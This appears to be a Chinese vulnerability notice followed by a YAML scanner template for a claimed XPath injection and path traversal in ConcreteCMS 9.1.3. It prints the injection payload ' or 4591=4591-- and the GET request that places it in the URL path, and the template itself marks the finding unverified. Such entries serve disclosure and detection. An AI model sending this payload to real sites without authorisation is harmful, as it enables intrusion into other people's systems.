漏洞描述
URL 路径文件夹3似乎容易受到 XPath 注入攻击。测试payload 50539478' or 4591=4591--提交到URL路径文件夹3,返回XPath错误信息。攻击者可以利用此漏洞向系统发出大量请求,直到他收到该系统所有内容的实际路径,这些内容存储在某些内部或外部服务器上。
concretecms-9-1-3-xpath-injection: concretecms-9.1.3 - XPath注入 - 文件路径遍历
PoC代码[已公开]
id: concretecms-9-1-3-xpath-injection
info:
name: concretecms-9.1.3 - XPath注入 - 文件路径遍历
author: nu11secur1ty
severity: high
verified: false
description: URL 路径文件夹3似乎容易受到 XPath 注入攻击。测试payload 50539478' or 4591=4591--提交到URL路径文件夹3,返回XPath错误信息。攻击者可以利用此漏洞向系统发出大量请求,直到他收到该系统所有内容的实际路径,这些内容存储在某些内部或外部服务器上。
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3
rules:
r0:
request:
method: GET
path: /index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
expression: response.status == 500 && response.body.bcontains(b'include():') && response.body.bcontains(b'Failed opening') && response.body.bcontains(b'ErrorException:')
expression: r0()